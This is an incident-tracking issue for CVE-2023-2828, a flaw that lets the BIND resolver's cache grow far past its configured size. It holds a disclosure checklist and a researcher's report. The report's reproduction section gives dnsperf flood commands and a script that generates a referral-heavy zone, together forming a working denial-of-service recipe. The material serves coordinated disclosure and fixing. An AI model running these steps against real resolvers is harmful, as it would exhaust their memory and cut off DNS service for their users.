[CVE-2023-2828] named's configured cache size limit can be significantly exceeded
Quick Links | |
---|---|
Incident Manager: | @michal |
Deputy Incident Manager: | @aram |
Public Disclosure Date: | 2023-06-21 |
CVSS Score: | 7.5 |
Security Advisory: | isc-private/printing-press!54 |
Mattermost Channel: | CVE-2023-2828: max-cache-size can be significantly exceeded |
Support Ticket: | N/A |
Release Checklist: | #4123 (closed) |
Post-mortem Etherpad: | postmortem-2023-06 |
Earlier Than T-5
- (IM) Pick a Deputy Incident Manager
- (IM) Respond to the bug reporter
- (IM) Create an Etherpad for post-mortem
- (SwEng) Ensure there are no public merge requests which inadvertently disclose the issue
- (IM) Assign a CVE identifier
- (SwEng) Update this issue with the assigned CVE identifier and the CVSS score
- (SwEng) Determine the range of product versions affected (including the Subscription Edition)
- (SwEng) Determine whether workarounds for the problem exist
- (SwEng) If necessary, coordinate with other parties
- (Support) Prepare and send out "earliest" notifications
- (Support) Create a merge request for the Security Advisory and include all readily available information in it
- (SwEng) Prepare a private merge request containing a system test reproducing the problem
- (SwEng) Notify Support when a reproducer is ready
- (SwEng) Prepare a detailed explanation of the code flow triggering the problem
- (SwEng) Prepare a private merge request with the fix
- (SwEng) Ensure the merge request with the fix is reviewed and has no outstanding discussions
- (Support) Review the documentation changes introduced by the merge request with the fix
- (SwEng) Prepare backports of the merge request addressing the problem for all affected (and still maintained) branches of a given product
- (Support) Finish preparing the Security Advisory
- (QA) Create (or update) the private issue containing links to fixes & reproducers for all CVEs fixed in a given release cycle
- (QA) (BIND 9 only) Reserve a block of CHANGES placeholders once the complete set of vulnerabilities fixed in a given release cycle is determined
- (QA) Merge the CVE fixes in CVE identifier order
- (QA) Prepare a standalone patch for the last stable release of each affected (and still maintained) product branch
- (QA) Prepare ASN releases (as outlined in the Release Checklist)
At T-5
- (Support) Send ASN to eligible customers
- (Support) (BIND 9 only) Send a pre-announcement email to the bind-announce mailing list to alert users that the upcoming release will include security fixes
At T-4
- (Support) Verify that all ASN-eligible customers have received the notification email
At T-1
- (Support) Verify that any new or reinstated customers have received the notification email
- (First IM) Send notifications to OS packagers
On the Day of Public Disclosure
- (IM) Grant Support clearance to proceed with public release
- (Support) Publish the releases (as outlined in the release checklist)
- (Support) (BIND 9 only) Update vulnerability matrix in the Knowledge Base
- (Support) Bump Document Version for the Security Advisory and publish it in the Knowledge Base
- (First IM) Send notification emails to third parties
- (First IM) Advise MITRE about the disclosed CVEs
- (First IM) Merge the Security Advisory merge request
- (IM) Inform original reporter (if external) that the security disclosure process is complete
- (Support) Inform customers a fix has been released
After Public Disclosure
- (First IM) Organize post-mortem meeting and make sure it happens
- (Support) Close support tickets
- (QA) Merge a regression test reproducing the bug into all affected (and still maintained) branches
Summary
This vulnerability causes a DNS resolver's cache memory usage to grow far beyond the configured maximum cache size. It is triggered when the resolver receives around 20,000 queries over a period ranging from minutes to hours. For example, at 250 QPS, 1000MB of RAM is in use after 80 seconds with max-cache-size set to 32MB (example results are attached to this message).
BIND version used
BIND 9.16.40 (Extended Support Version) id:113a865
Steps to reproduce
We reproduced the NRDelegationAttack with some changes. For more details, see: https://www.usenix.org/system/files/sec23fall-prepub-309-afek.pdf
- Set the maximum cache size to 32MB in named.conf.options (attached example: named.conf.options):
  options {
  ...
  max-cache-size 32m;
  ...
  };
- Run the resolver:
  named -g -c /etc/named.conf
- Run psrecord to record the resolver's RAM usage:
  psrecord NAMED_PID --interval 1 --plot OUTPUT_FILE.png
- Option a:
  Send up to 50,000 DNS queries for names under my domain (shoham-shani.online; my authoritative server's IP address is 74.234.116.29):
  dig shoham{count}.shoham-shani.online. @resolver_ip (count runs from 0 to 49,999)
  You can use dnsperf for this: dnsperf -d queries.txt -s resolver_ip -v -Q 250 (an example queries.txt is attached: queries.txt).
  Alternatively, you can provide us with a test resolver that you want us to attack, and we will perform the attack from our client side at a time we agree on.
- Option b:
  Create a zone file (example attached: shoham-shani.online_zonefile_example.txt) that returns 1500 referrals per request. You can use this script to generate it:
  # Write 1500 NS (referral) records for each shoham{i} name.
  with open('zonfile.txt', 'w') as f:
      for i in range(1, 50000):
          for j in range(0, 1500):
              print(f'shoham{i} 8600 IN NS attack{j}.auth{j}.shoham.store.', file=f)
  Create another zone file that answers all shoham{i}.shoham.store. requests (example attached: shoham.store_zonefile_example_copy.txt). For example:
  * IN A 127.0.0.1
  Then send 50,000 DNS queries as described in option a.
- Take a dump of the cache and examine its size:
  rndc dumpdb -cache
- Stop the resolver service and download the OUTPUT_FILE.png image to examine RAM usage.
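For option a, the dnsperf input file can be generated rather than written by hand. The sketch below assumes dnsperf's one-query-per-line input format (`name type`) and assumes an `A` query type, which the report does not state; the attached queries.txt may differ. The function name `build_queries` is hypothetical.

```python
def build_queries(domain="shoham-shani.online.", count=50_000, qtype="A"):
    """Return dnsperf input lines, one 'name type' pair per line.

    qtype="A" is an assumption; the report does not say which
    record type the attached queries.txt uses.
    """
    return [f"shoham{i}.{domain} {qtype}" for i in range(count)]


if __name__ == "__main__":
    # Write the file consumed by: dnsperf -d queries.txt -s resolver_ip -v -Q 250
    with open("queries.txt", "w") as f:
        f.write("\n".join(build_queries()) + "\n")
```

The names run from shoham0 to shoham49999, matching the count range given for the dig command.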
Note: we tested the bug with max-cache-size set to 32MB, 64MB, and 1GB, at rates of 1, 5, 10, 13, 100, and 250 QPS (all the results are attached).
For 1 QPS I got 440MB RAM used after 8,000 seconds for max-cache-size 32MB
For 5 QPS I got 840MB RAM used after 4,000 seconds for max-cache-size 32MB
For 10 QPS I got 840MB RAM used after 2,000 seconds for max-cache-size 32MB
For 100 QPS I got 840MB RAM used after 200 seconds for max-cache-size 32MB
For 250 QPS I got 1000MB RAM used after 80 seconds for max-cache-size 32MB
For 13 QPS I got 1550MB RAM used after 1150 seconds for max-cache-size 1000MB
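The measurements above can be put on a common footing by converting each one into a total query count and a ratio of RAM used to the configured limit. This is a rough sketch: it assumes queries were sent at a constant rate for the whole interval, and the RAM figure is for the whole process as recorded by psrecord, so the ratio is only an upper bound on how far the cache itself overshoots.

```python
# (qps, seconds, ram_mb, max_cache_mb), copied from the measurements above
RESULTS = [
    (1, 8000, 440, 32),
    (5, 4000, 840, 32),
    (10, 2000, 840, 32),
    (100, 200, 840, 32),
    (250, 80, 1000, 32),
    (13, 1150, 1550, 1000),
]


def summarize(results):
    """Compute total queries sent and RAM-to-limit ratio for each run."""
    rows = []
    for qps, seconds, ram_mb, limit_mb in results:
        rows.append({
            "qps": qps,
            "queries": qps * seconds,        # assumes a constant query rate
            "overshoot": ram_mb / limit_mb,  # process RAM / max-cache-size
        })
    return rows


for row in summarize(RESULTS):
    print(f"{row['qps']:>4} QPS  {row['queries']:>6} queries  "
          f"{row['overshoot']:.2f}x limit")
```

Under these assumptions, the 5, 10, 100, and 250 QPS runs with a 32MB limit all correspond to 20,000 queries, which matches the figure given in the Summary.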
What is the current bug behavior?
- The cache grows beyond the configured limit, so an ever-increasing amount of memory is allocated. In addition, if the machine runs out of available memory, the resolver service will crash.
- The buffer holding the referral list is never freed, so the memory allocated for buffers keeps growing (see the dns_rdataslab_fromrdataset function, line 272 of rdataslab.c).
- The cache size calculation does not seem to account for referral answers from authoritative nameservers, although they are stored in the cache.
- The high and low watermarks are incorrectly set to 0, so the resolver is unaware that memory usage exceeds the maximum level and does not reduce it.
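To illustrate why zeroed watermarks matter, the sketch below models a generic high/low watermark check. It is a simplified, hypothetical model and not BIND's implementation: the class `WatermarkMonitor`, the watermark values, and the rule that a high watermark of 0 means "no limit" are all assumptions made for illustration.

```python
class WatermarkMonitor:
    """Toy model of a high/low watermark memory check (not BIND code)."""

    def __init__(self, hi_water, lo_water):
        self.hi_water = hi_water
        self.lo_water = lo_water
        self.in_use = 0
        self.over_limit = False  # True while cleanup should be running

    def allocate(self, size):
        self.in_use += size
        # Assumption: a high watermark of 0 means "no limit configured",
        # so the over-limit check is skipped entirely.
        if self.hi_water != 0 and self.in_use > self.hi_water:
            self.over_limit = True

    def release(self, size):
        self.in_use -= size
        # Cleanup stops once usage drops below the low watermark.
        if self.over_limit and self.in_use < self.lo_water:
            self.over_limit = False


MB = 1024 * 1024

# Illustrative watermarks just below a 32MB limit versus zeroed watermarks.
configured = WatermarkMonitor(hi_water=28 * MB, lo_water=24 * MB)
zeroed = WatermarkMonitor(hi_water=0, lo_water=0)
for monitor in (configured, zeroed):
    monitor.allocate(100 * MB)

print(configured.over_limit)  # True
print(zeroed.over_limit)      # False
```

In this model the monitor with zeroed watermarks never signals that cleanup is needed, no matter how much memory is allocated, which is the behavior described in the last point above.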
What is the expected correct behavior?
- The cache size should not exceed the maximum size we configured.
- The buffer (rawbuf in rdataslab.c) should be freed.
- The cache size calculation should take the referral list into account, and entries should be deleted when the cache exceeds the configured limit.
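The expected behavior can be sketched as a cache that counts every stored entry, referrals included, against the limit and evicts the oldest entries once the limit is exceeded. This is a hypothetical toy model, not BIND's cache-cleaning algorithm: the class `BoundedCache`, the oldest-first eviction policy, and the 64-byte record size are assumptions.

```python
from collections import OrderedDict


class BoundedCache:
    """Toy size-bounded cache; every entry type counts toward the limit."""

    def __init__(self, max_bytes):
        self.max_bytes = max_bytes
        self.used_bytes = 0
        self._entries = OrderedDict()  # key -> size in bytes, oldest first

    def add(self, key, size):
        # Replacing an entry first releases the bytes it used before.
        if key in self._entries:
            self.used_bytes -= self._entries.pop(key)
        self._entries[key] = size
        self.used_bytes += size
        # Evict the oldest entries until usage is back under the limit.
        while self.used_bytes > self.max_bytes and len(self._entries) > 1:
            _, evicted_size = self._entries.popitem(last=False)
            self.used_bytes -= evicted_size

    def __len__(self):
        return len(self._entries)


cache = BoundedCache(max_bytes=32 * 1024 * 1024)
for i in range(1000):
    # Hypothetical referral: 1500 NS records at an assumed 64 bytes each.
    cache.add(("referral", f"shoham{i}"), 1500 * 64)

print(cache.used_bytes <= cache.max_bytes)
```

Because referral entries are charged to `used_bytes` like any other entry, inserting more of them evicts older ones instead of growing memory without bound.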
Relevant configuration files
Configuration file: named.conf.options
Zone files: shoham-shani.online_zonefile_example.txt, shoham.store_zonefile_example copy.txt
Relevant logs and/or screenshots
Tests are attached
Possible fixes
- Free the buffer:
free_rawbuf:
isc_mem_put(mctx, rawbuf, buflen);
Please add the following people to this issue: Yehuda Afek, yehuda.afek@gmail.com /cc @afek; Anat Bremler-Barr, anat.bremlerbarr@gmail.com /cc @anat_bremler_barr; Yuval Shavitt, shavitt@eng.tau.ac.il